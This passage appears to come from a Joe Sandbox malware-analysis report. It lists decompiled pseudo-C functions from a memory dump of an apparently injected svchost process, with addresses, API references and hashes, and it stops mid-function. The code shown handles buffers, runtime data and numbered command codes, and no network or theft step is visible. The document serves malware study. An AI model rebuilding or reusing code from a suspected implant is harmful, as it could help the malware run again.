                                                                                                                                                                                                                                                                      				intOrPtr _v24;
                                                                                                                                                                                                                                                                      				intOrPtr _v28;
                                                                                                                                                                                                                                                                      				intOrPtr _v32;
                                                                                                                                                                                                                                                                      				intOrPtr _v36;
                                                                                                                                                                                                                                                                      				intOrPtr _v40;
                                                                                                                                                                                                                                                                      				intOrPtr _v44;
                                                                                                                                                                                                                                                                      				intOrPtr _v48;
                                                                                                                                                                                                                                                                      				intOrPtr _v52;
                                                                                                                                                                                                                                                                      				intOrPtr _v56;
                                                                                                                                                                                                                                                                      				intOrPtr _t55;
                                                                                                                                                                                                                                                                      				intOrPtr _t56;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_v40 = __ecx;
                                                                                                                                                                                                                                                                      				if( *((intOrPtr*)(_v40 + 4)) != 0) {
                                                                                                                                                                                                                                                                      					_v12 =  *((intOrPtr*)(_v40 + 4));
                                                                                                                                                                                                                                                                      					_v8 = _v12;
                                                                                                                                                                                                                                                                      					if(_v8 == 0) {
                                                                                                                                                                                                                                                                      						_v44 = 0;
                                                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                                                      						_v44 = E04006720(_v8, 1);
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_v40 + 4)) = 0x666;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				if( *((intOrPtr*)(_v40 + 8)) != 0) {
                                                                                                                                                                                                                                                                      					_v20 =  *((intOrPtr*)(_v40 + 8));
                                                                                                                                                                                                                                                                      					_v16 = _v20;
                                                                                                                                                                                                                                                                      					if(_v16 == 0) {
                                                                                                                                                                                                                                                                      						_v48 = 0;
                                                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                                                      						_v48 = E04006750(_v16, 1);
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_v40 + 8)) = 0x666;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				if( *((intOrPtr*)(_v40 + 0xc)) != 0) {
                                                                                                                                                                                                                                                                      					_v28 =  *((intOrPtr*)(_v40 + 0xc));
                                                                                                                                                                                                                                                                      					_v24 = _v28;
                                                                                                                                                                                                                                                                      					if(_v24 == 0) {
                                                                                                                                                                                                                                                                      						_v52 = 0;
                                                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                                                      						_v52 = E04004EA0(_v24, 1);
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_v40 + 0xc)) = 0x666;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				_t55 = _v40;
                                                                                                                                                                                                                                                                      				if( *((intOrPtr*)(_t55 + 0x20)) != 0) {
                                                                                                                                                                                                                                                                      					_v36 =  *((intOrPtr*)(_v40 + 0x20));
                                                                                                                                                                                                                                                                      					_t56 = _v36;
                                                                                                                                                                                                                                                                      					_v32 = _t56;
                                                                                                                                                                                                                                                                      					if(_v32 == 0) {
                                                                                                                                                                                                                                                                      						_v56 = 0;
                                                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                                                      						_t56 = E04004EA0(_v32, 1);
                                                                                                                                                                                                                                                                      						_v56 = _t56;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_v40 + 0x20)) = 0x666;
                                                                                                                                                                                                                                                                      					return _t56;
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				return _t55;
                                                                                                                                                                                                                                                                      			}


















                                                                                                                                                                                                                                                                      0x04014ec6
                                                                                                                                                                                                                                                                      0x04014ed0
                                                                                                                                                                                                                                                                      0x04014ed8
                                                                                                                                                                                                                                                                      0x04014ede
                                                                                                                                                                                                                                                                      0x04014ee5
                                                                                                                                                                                                                                                                      0x04014ef6
                                                                                                                                                                                                                                                                      0x04014ee7
                                                                                                                                                                                                                                                                      0x04014ef1
                                                                                                                                                                                                                                                                      0x04014ef1
                                                                                                                                                                                                                                                                      0x04014f00
                                                                                                                                                                                                                                                                      0x04014f00
                                                                                                                                                                                                                                                                      0x04014f0e
                                                                                                                                                                                                                                                                      0x04014f16
                                                                                                                                                                                                                                                                      0x04014f1c
                                                                                                                                                                                                                                                                      0x04014f23
                                                                                                                                                                                                                                                                      0x04014f34
                                                                                                                                                                                                                                                                      0x04014f25
                                                                                                                                                                                                                                                                      0x04014f2f
                                                                                                                                                                                                                                                                      0x04014f2f
                                                                                                                                                                                                                                                                      0x04014f3e
                                                                                                                                                                                                                                                                      0x04014f3e
                                                                                                                                                                                                                                                                      0x04014f4c
                                                                                                                                                                                                                                                                      0x04014f54
                                                                                                                                                                                                                                                                      0x04014f5a
                                                                                                                                                                                                                                                                      0x04014f61
                                                                                                                                                                                                                                                                      0x04014f72
                                                                                                                                                                                                                                                                      0x04014f63
                                                                                                                                                                                                                                                                      0x04014f6d
                                                                                                                                                                                                                                                                      0x04014f6d
                                                                                                                                                                                                                                                                      0x04014f7c
                                                                                                                                                                                                                                                                      0x04014f7c
                                                                                                                                                                                                                                                                      0x04014f83
                                                                                                                                                                                                                                                                      0x04014f8a
                                                                                                                                                                                                                                                                      0x04014f92
                                                                                                                                                                                                                                                                      0x04014f95
                                                                                                                                                                                                                                                                      0x04014f98
                                                                                                                                                                                                                                                                      0x04014f9f
                                                                                                                                                                                                                                                                      0x04014fb0
                                                                                                                                                                                                                                                                      0x04014fa1
                                                                                                                                                                                                                                                                      0x04014fa6
                                                                                                                                                                                                                                                                      0x04014fab
                                                                                                                                                                                                                                                                      0x04014fab
                                                                                                                                                                                                                                                                      0x04014fba
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x04014fba
                                                                                                                                                                                                                                                                      0x04014fc4

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.817211528.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.817211528.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: codecvt
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 3662085145-0
                                                                                                                                                                                                                                                                      • Opcode ID: 293eff8e08c402cabf5be0573675e725eacdbb13c63a1d46bf353841e3f01ce6
                                                                                                                                                                                                                                                                      • Instruction ID: 6fde489f6c5f844b1c7bf651d9850ea7eb6d4f342482ed0b4f1dd667ca52f8cd
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 293eff8e08c402cabf5be0573675e725eacdbb13c63a1d46bf353841e3f01ce6
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7D416E74A00209DBDB04CF94D694BEEBBF2BB48308F248199D4057B3A1D776AE85DF90
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      C-Code - Quality: 89%
                                                                                                                                                                                                                                                                      			E0400CBC9(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                                                                                      				intOrPtr _t28;
                                                                                                                                                                                                                                                                      				void* _t29;
                                                                                                                                                                                                                                                                      				void* _t30;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_t30 = __eflags;
                                                                                                                                                                                                                                                                      				_t26 = __edi;
                                                                                                                                                                                                                                                                      				_t25 = __edx;
                                                                                                                                                                                                                                                                      				_t22 = __ebx;
                                                                                                                                                                                                                                                                      				_push(0xc);
                                                                                                                                                                                                                                                                      				_push(0x427b08);
                                                                                                                                                                                                                                                                      				E04009CE8(__ebx, __edi, __esi);
                                                                                                                                                                                                                                                                      				_t28 = E04009556(__ebx, __edx, __edi, _t30);
                                                                                                                                                                                                                                                                      				if(( *(_t28 + 0x70) &  *0x429cb0) == 0) {
                                                                                                                                                                                                                                                                      					L6:
                                                                                                                                                                                                                                                                      					E0400B404(_t22, 0xc);
                                                                                                                                                                                                                                                                      					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
                                                                                                                                                                                                                                                                      					_t8 = _t28 + 0x6c; // 0x6c
                                                                                                                                                                                                                                                                      					_t26 =  *0x4294d8;
                                                                                                                                                                                                                                                                      					 *((intOrPtr*)(_t29 - 0x1c)) = E0400CB8B(_t8,  *0x4294d8);
                                                                                                                                                                                                                                                                      					 *(_t29 - 4) = 0xfffffffe;
                                                                                                                                                                                                                                                                      					E0400CC33();
                                                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                                                      					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
                                                                                                                                                                                                                                                                      					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
                                                                                                                                                                                                                                                                      						goto L6;
                                                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                                                      						_t28 =  *((intOrPtr*)(E04009556(__ebx, __edx, __edi, _t32) + 0x6c));
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				if(_t28 == 0) {
                                                                                                                                                                                                                                                                      					E040099DE(_t25, _t26, 0x20);
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				return E04009D2D(_t28);
                                                                                                                                                                                                                                                                      			}






                                                                                                                                                                                                                                                                      0x0400cbc9
                                                                                                                                                                                                                                                                      0x0400cbc9
                                                                                                                                                                                                                                                                      0x0400cbc9
                                                                                                                                                                                                                                                                      0x0400cbc9
                                                                                                                                                                                                                                                                      0x0400cbc9
                                                                                                                                                                                                                                                                      0x0400cbcb
                                                                                                                                                                                                                                                                      0x0400cbd0
                                                                                                                                                                                                                                                                      0x0400cbda
                                                                                                                                                                                                                                                                      0x0400cbe4
                                                                                                                                                                                                                                                                      0x0400cc08
                                                                                                                                                                                                                                                                      0x0400cc0a
                                                                                                                                                                                                                                                                      0x0400cc10
                                                                                                                                                                                                                                                                      0x0400cc14
                                                                                                                                                                                                                                                                      0x0400cc17
                                                                                                                                                                                                                                                                      0x0400cc22
                                                                                                                                                                                                                                                                      0x0400cc25
                                                                                                                                                                                                                                                                      0x0400cc2c
                                                                                                                                                                                                                                                                      0x0400cbe6
                                                                                                                                                                                                                                                                      0x0400cbe6
                                                                                                                                                                                                                                                                      0x0400cbea
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0400cbec
                                                                                                                                                                                                                                                                      0x0400cbf1
                                                                                                                                                                                                                                                                      0x0400cbf1
                                                                                                                                                                                                                                                                      0x0400cbea
                                                                                                                                                                                                                                                                      0x0400cbf6
                                                                                                                                                                                                                                                                      0x0400cbfa
                                                                                                                                                                                                                                                                      0x0400cbff
                                                                                                                                                                                                                                                                      0x0400cc07

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __getptd.LIBCMT ref: 0400CBD5
                                                                                                                                                                                                                                                                        • Part of subcall function 04009556: __getptd_noexit.LIBCMT ref: 04009559
                                                                                                                                                                                                                                                                        • Part of subcall function 04009556: __amsg_exit.LIBCMT ref: 04009566
                                                                                                                                                                                                                                                                      • __getptd.LIBCMT ref: 0400CBEC
                                                                                                                                                                                                                                                                      • __amsg_exit.LIBCMT ref: 0400CBFA
                                                                                                                                                                                                                                                                      • __lock.LIBCMT ref: 0400CC0A
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.817211528.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.817211528.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 3521780317-0
                                                                                                                                                                                                                                                                      • Opcode ID: 1f0354d96fabdbc1a2ba5b958ed8245a13b2cce1e2fe9863332c0abb1a1d4ff1
                                                                                                                                                                                                                                                                      • Instruction ID: 775b438eefefd3dc35736b17a6f12e75e8ac1b8e9e2c3c2db30c63f4ae9875e3
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1f0354d96fabdbc1a2ba5b958ed8245a13b2cce1e2fe9863332c0abb1a1d4ff1
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3EF06D71A19704CBF724BBA98801B8933E06B0072CF55C219C041BB2D1CB34B902CB55
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      C-Code - Quality: 40%
                                                                                                                                                                                                                                                                      			E0401F9F0(void* __ebx, intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                      				char _v5;
                                                                                                                                                                                                                                                                      				intOrPtr _v12;
                                                                                                                                                                                                                                                                      				intOrPtr _v16;
                                                                                                                                                                                                                                                                      				intOrPtr _v20;
                                                                                                                                                                                                                                                                      				intOrPtr _v24;
                                                                                                                                                                                                                                                                      				signed int _v28;
                                                                                                                                                                                                                                                                      				void _v84;
                                                                                                                                                                                                                                                                      				intOrPtr _v88;
                                                                                                                                                                                                                                                                      				signed short _v90;
                                                                                                                                                                                                                                                                      				signed short _v92;
                                                                                                                                                                                                                                                                      				signed short _v94;
                                                                                                                                                                                                                                                                      				signed short _v96;
                                                                                                                                                                                                                                                                      				signed short _v98;
                                                                                                                                                                                                                                                                      				signed short _v102;
                                                                                                                                                                                                                                                                      				signed short _v104;
                                                                                                                                                                                                                                                                      				intOrPtr _v108;
                                                                                                                                                                                                                                                                      				intOrPtr _v112;
                                                                                                                                                                                                                                                                      				intOrPtr _v116;
                                                                                                                                                                                                                                                                      				intOrPtr _v120;
                                                                                                                                                                                                                                                                      				intOrPtr _v124;
                                                                                                                                                                                                                                                                      				intOrPtr _v128;
                                                                                                                                                                                                                                                                      				intOrPtr _v132;
                                                                                                                                                                                                                                                                      				intOrPtr _v136;
                                                                                                                                                                                                                                                                      				intOrPtr* _v140;
                                                                                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                                                                                      				void* _t149;
                                                                                                                                                                                                                                                                      				void* _t180;
                                                                                                                                                                                                                                                                      				signed int _t209;
                                                                                                                                                                                                                                                                      				void* _t210;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_t180 = __edx;
                                                                                                                                                                                                                                                                      				_t149 = __ebx;
                                                                                                                                                                                                                                                                      				_v28 =  *0x429024 ^ _t209;
                                                                                                                                                                                                                                                                      				_v140 = __ecx;
                                                                                                                                                                                                                                                                      				_v5 = 0;
                                                                                                                                                                                                                                                                      				while(_a4 != 0 && _a8 >= 1) {
                                                                                                                                                                                                                                                                      					_v16 = _a4;
                                                                                                                                                                                                                                                                      					_v12 = _a8;
                                                                                                                                                                                                                                                                      					if(_a12 != 0) {
                                                                                                                                                                                                                                                                      						memcpy( &_v84, 0x427564, 0xd << 2);
                                                                                                                                                                                                                                                                      						asm("movsw");
                                                                                                                                                                                                                                                                      						asm("movsb");
                                                                                                                                                                                                                                                                      						_v20 = 0x200;
                                                                                                                                                                                                                                                                      						_v112 = E04020CE0(_v20 + 1);
                                                                                                                                                                                                                                                                      						_v24 = _v112;
                                                                                                                                                                                                                                                                      						E04007010(0x42757e, _v24, 0, _v20 + 1);
                                                                                                                                                                                                                                                                      						 *0x4250e8( &_v104);
                                                                                                                                                                                                                                                                      						 *0x4251f8(_v24, _v20 + 1,  &_v84, _v104 & 0x0000ffff, _v102 & 0x0000ffff, _v98 & 0x0000ffff, _v96 & 0x0000ffff, _v94 & 0x0000ffff, _v92 & 0x0000ffff, _v90 & 0x0000ffff, _a12);
                                                                                                                                                                                                                                                                      						_v88 = E040070A0(_v24);
                                                                                                                                                                                                                                                                      						_v116 = E04020CE0(_a8 + _v88);
                                                                                                                                                                                                                                                                      						_v16 = _v116;
                                                                                                                                                                                                                                                                      						_push(_v88);
                                                                                                                                                                                                                                                                      						E04006CA0(_t149, 0x42757e, 0x427564, _v16, _v24);
                                                                                                                                                                                                                                                                      						_push(_a8);
                                                                                                                                                                                                                                                                      						E04006CA0(_t149, 0x42757e, 0x427564, _v16 + _v88, _a4);
                                                                                                                                                                                                                                                                      						_t210 = _t210 + 0x68;
                                                                                                                                                                                                                                                                      						_v12 = _a8 + _v88;
                                                                                                                                                                                                                                                                      						if(_v24 != 0) {
                                                                                                                                                                                                                                                                      							_v120 = _v24;
                                                                                                                                                                                                                                                                      							E04020CC0(_v120);
                                                                                                                                                                                                                                                                      							_t210 = _t210 + 4;
                                                                                                                                                                                                                                                                      							_v24 = 0x666;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					if( *_v140 != 0) {
                                                                                                                                                                                                                                                                      						_v128 = E04020CE0( *((intOrPtr*)(_v140 + 4)) + _v12);
                                                                                                                                                                                                                                                                      						_v108 = _v128;
                                                                                                                                                                                                                                                                      						_push( *((intOrPtr*)(_v140 + 4)));
                                                                                                                                                                                                                                                                      						E04006CA0(_t149, 0x42757e, 0x427564, _v108,  *_v140);
                                                                                                                                                                                                                                                                      						_push(_v12);
                                                                                                                                                                                                                                                                      						E04006CA0(_t149, 0x42757e, 0x427564, _v108 +  *((intOrPtr*)(_v140 + 4)), _v16);
                                                                                                                                                                                                                                                                      						_t210 = _t210 + 0x1c;
                                                                                                                                                                                                                                                                      						if( *_v140 != 0) {
                                                                                                                                                                                                                                                                      							_v132 =  *_v140;
                                                                                                                                                                                                                                                                      							E04020CC0(_v132);
                                                                                                                                                                                                                                                                      							_t210 = _t210 + 4;
                                                                                                                                                                                                                                                                      							 *_v140 = 0x666;
                                                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                                                      						 *_v140 = _v108;
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_v140 + 4)) =  *((intOrPtr*)(_v140 + 4)) + _v12;
                                                                                                                                                                                                                                                                      						_v5 = 1;
                                                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                                                      						_v124 = E04020CE0(_v12);
                                                                                                                                                                                                                                                                      						 *_v140 = _v124;
                                                                                                                                                                                                                                                                      						_push(_v12);
                                                                                                                                                                                                                                                                      						E04006CA0(_t149, 0x42757e, 0x427564,  *_v140, _v16);
                                                                                                                                                                                                                                                                      						_t210 = _t210 + 0x10;
                                                                                                                                                                                                                                                                      						 *((intOrPtr*)(_v140 + 4)) = _v12;
                                                                                                                                                                                                                                                                      						_v5 = 1;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					if(_v16 != _a4 && _v16 != 0) {
                                                                                                                                                                                                                                                                      						_v136 = _v16;
                                                                                                                                                                                                                                                                      						E04020CC0(_v136);
                                                                                                                                                                                                                                                                      						_t210 = _t210 + 4;
                                                                                                                                                                                                                                                                      						_v16 = 0x666;
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      					_t180 = 0;
                                                                                                                                                                                                                                                                      					if(0 != 0) {
                                                                                                                                                                                                                                                                      						continue;
                                                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                                                      						L16:
                                                                                                                                                                                                                                                                      						return E04006C8C(_v5, _t149, _v28 ^ _t209, _t180, 0x42757e, 0x427564);
                                                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                                                      				goto L16;
                                                                                                                                                                                                                                                                      			}

































                                                                                                                                                                                                                                                                      0x0401f9f0
                                                                                                                                                                                                                                                                      0x0401f9f0
                                                                                                                                                                                                                                                                      0x0401fa00
                                                                                                                                                                                                                                                                      0x0401fa05
                                                                                                                                                                                                                                                                      0x0401fa0b
                                                                                                                                                                                                                                                                      0x0401fa0f
                                                                                                                                                                                                                                                                      0x0401fa23
                                                                                                                                                                                                                                                                      0x0401fa29
                                                                                                                                                                                                                                                                      0x0401fa30
                                                                                                                                                                                                                                                                      0x0401fa43
                                                                                                                                                                                                                                                                      0x0401fa45
                                                                                                                                                                                                                                                                      0x0401fa47
                                                                                                                                                                                                                                                                      0x0401fa48
                                                                                                                                                                                                                                                                      0x0401fa5e
                                                                                                                                                                                                                                                                      0x0401fa64
                                                                                                                                                                                                                                                                      0x0401fa74
                                                                                                                                                                                                                                                                      0x0401fa80
                                                                                                                                                                                                                                                                      0x0401fabc
                                                                                                                                                                                                                                                                      0x0401fad1
                                                                                                                                                                                                                                                                      0x0401fae3
                                                                                                                                                                                                                                                                      0x0401fae9
                                                                                                                                                                                                                                                                      0x0401faef
                                                                                                                                                                                                                                                                      0x0401faf8
                                                                                                                                                                                                                                                                      0x0401fb03
                                                                                                                                                                                                                                                                      0x0401fb0f
                                                                                                                                                                                                                                                                      0x0401fb14
                                                                                                                                                                                                                                                                      0x0401fb1d
                                                                                                                                                                                                                                                                      0x0401fb24
                                                                                                                                                                                                                                                                      0x0401fb29
                                                                                                                                                                                                                                                                      0x0401fb30
                                                                                                                                                                                                                                                                      0x0401fb35
                                                                                                                                                                                                                                                                      0x0401fb38
                                                                                                                                                                                                                                                                      0x0401fb38
                                                                                                                                                                                                                                                                      0x0401fb24
                                                                                                                                                                                                                                                                      0x0401fb48
                                                                                                                                                                                                                                                                      0x0401fba7
                                                                                                                                                                                                                                                                      0x0401fbad
                                                                                                                                                                                                                                                                      0x0401fbb9
                                                                                                                                                                                                                                                                      0x0401fbc7
                                                                                                                                                                                                                                                                      0x0401fbd2
                                                                                                                                                                                                                                                                      0x0401fbe4
                                                                                                                                                                                                                                                                      0x0401fbe9
                                                                                                                                                                                                                                                                      0x0401fbf5
                                                                                                                                                                                                                                                                      0x0401fbff
                                                                                                                                                                                                                                                                      0x0401fc06
                                                                                                                                                                                                                                                                      0x0401fc0b
                                                                                                                                                                                                                                                                      0x0401fc14
                                                                                                                                                                                                                                                                      0x0401fc14
                                                                                                                                                                                                                                                                      0x0401fc23
                                                                                                                                                                                                                                                                      0x0401fc37
                                                                                                                                                                                                                                                                      0x0401fc3a
                                                                                                                                                                                                                                                                      0x0401fb4a
                                                                                                                                                                                                                                                                      0x0401fb56
                                                                                                                                                                                                                                                                      0x0401fb62
                                                                                                                                                                                                                                                                      0x0401fb67
                                                                                                                                                                                                                                                                      0x0401fb75
                                                                                                                                                                                                                                                                      0x0401fb7a
                                                                                                                                                                                                                                                                      0x0401fb86
                                                                                                                                                                                                                                                                      0x0401fb89
                                                                                                                                                                                                                                                                      0x0401fb89
                                                                                                                                                                                                                                                                      0x0401fc44
                                                                                                                                                                                                                                                                      0x0401fc4f
                                                                                                                                                                                                                                                                      0x0401fc5c
                                                                                                                                                                                                                                                                      0x0401fc61
                                                                                                                                                                                                                                                                      0x0401fc64
                                                                                                                                                                                                                                                                      0x0401fc64
                                                                                                                                                                                                                                                                      0x0401fc6b
                                                                                                                                                                                                                                                                      0x0401fc6d
                                                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                                                      0x0401fc73
                                                                                                                                                                                                                                                                      0x0401fc73
                                                                                                                                                                                                                                                                      0x0401fc85
                                                                                                                                                                                                                                                                      0x0401fc85
                                                                                                                                                                                                                                                                      0x0401fc6d
                                                                                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000006.00000002.817211528.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000006.00000002.817211528.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: _memset_strlen
                                                                                                                                                                                                                                                                      • String ID: duB
                                                                                                                                                                                                                                                                      • API String ID: 2279092321-2047154145
                                                                                                                                                                                                                                                                      • Opcode ID: 8ef916ac99e2acd8d5d850c8b0a63cac94112d2d259028affcb04b3b3e16ebb3
                                                                                                                                                                                                                                                                      • Instruction ID: c505e5f8326b13ea594a17ca5410903a82e5ac8279d4bf993f0f99441c28ac3a
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8ef916ac99e2acd8d5d850c8b0a63cac94112d2d259028affcb04b3b3e16ebb3
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1F913BB5D00218AFDB54CFD8D880BAEB7B5BF48318F14C159E909A7341EB35AA85CF51
                                                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                      C-Code - Quality: 74%
                                                                                                                                                                                                                                                                      			E0401C2A0(void* __edi, signed int _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                                                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                                                                                      				intOrPtr _v12;
                                                                                                                                                                                                                                                                      				intOrPtr* _v16;
                                                                                                                                                                                                                                                                      				signed char _v20;
                                                                                                                                                                                                                                                                      				signed char _v21;
                                                                                                                                                                                                                                                                      				char _v28;
                                                                                                                                                                                                                                                                      				intOrPtr _v32;
                                                                                                                                                                                                                                                                      				intOrPtr _v36;
                                                                                                                                                                                                                                                                      				signed int* _v40;
                                                                                                                                                                                                                                                                      				intOrPtr* _v44;
                                                                                                                                                                                                                                                                      				intOrPtr _v48;
                                                                                                                                                                                                                                                                      				intOrPtr _v52;
                                                                                                                                                                                                                                                                      				intOrPtr _v56;
                                                                                                                                                                                                                                                                      				intOrPtr _v60;
                                                                                                                                                                                                                                                                      				intOrPtr _v64;
                                                                                                                                                                                                                                                                      				intOrPtr _t103;
                                                                                                                                                                                                                                                                      				intOrPtr _t109;
                                                                                                                                                                                                                                                                      				void* _t115;
                                                                                                                                                                                                                                                                      				void* _t177;
                                                                                                                                                                                                                                                                      				void* _t178;
                                                                                                                                                                                                                                                                      				void* _t181;
                                                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                      				_t177 = __edi;
                                                                                                                                                                                                                                                                      				_v8 = 0;
                                                                                                                                                                                                                                                                      				while((_a4 & 0x0000ffff) == 1 || (_a4 & 0x0000ffff) == 2 || (_a4 & 0x0000ffff) == 3 || (_a4 & 0x0000ffff) == 4) {
                                                                                                                                                                                                                                                                      					if(_a8 == 0 || _a12 == 0) {
                                                                                                                                                                                                                                                                      						break;
                                                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                                                      						_v12 =  *0x4250e4(_a8);
                                                                                                                                                                                                                                                                      						if(_v12 < 1 || _v12 > 0x64) {
                                                                                                                                                                                                                                                                      							break;
                                                                                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                                                                                      							_v20 = 1;
                                                                                                                                                                                                                                                                      							if((_a4 & 0x0000ffff) == 4) {
                                                                                                                                                                                                                                                                      								L16:
                                                                                                                                                                                                                                                                      								_v21 = 0;
                                                                                                                                                                                                                                                                      								_v44 = E04020CE0(0xa);
                                                                                                                                                                                                                                                                      								_v16 = _v44;
                                                                                                                                                                                                                                                                      								E04007010(_t177, _v16, 0, 0xa);
                                                                                                                                                                                                                                                                      								 *((short*)(_v16 + 8)) = _a4;
                                                                                                                                                                                                                                                                      								_t103 = E04020CE0(_v12 + 1);
                                                                                                                                                                                                                                                                      								_t181 = _t178 + 0x14;
                                                                                                                                                                                                                                                                      								_v48 = _t103;
                                                                                                                                                                                                                                                                      								 *_v16 = _v48;
                                                                                                                                                                                                                                                                      								E04005A10(_v16,  *_v16, _v12 + 1, _a8);
                                                                                                                                                                                                                                                                      								if((_a4 & 0x0000ffff) != 4) {
                                                                                                                                                                                                                                                                      									_t109 = E04020CE0(_v20 + 1);
                                                                                                                                                                                                                                                                      									_t181 = _t181 + 4;
                                                                                                                                                                                                                                                                      									_v52 = _t109;
                                                                                                                                                                                                                                                                      									 *((intOrPtr*)(_v16 + 4)) = _v52;
                                                                                                                                                                                                                                                                      									E04005A10( *((intOrPtr*)(_v16 + 4)),  *((intOrPtr*)(_v16 + 4)), _v20 + 1, _a12);
                                                                                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                                                                                      									 *((intOrPtr*)(_v16 + 4)) =  *_a12;
                                                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                                                      								_v28 = E0401E4B0();
                                                                                                                                                                                                                                                                      								while(1) {
                                                                                                                                                                                                                                                                      									_t115 = E0401E4A0(_v28);
                                                                                                                                                                                                                                                                      									_t178 = _t181 + 4;
                                                                                                                                                                                                                                                                      									if(_t115 == 0) {
                                                                                                                                                                                                                                                                      										break;
                                                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                                                      									_v40 = 0xfa6d3c;
                                                                                                                                                                                                                                                                      									_v36 = 0x2710;
                                                                                                                                                                                                                                                                      									_v32 = 0xf9d0e8;
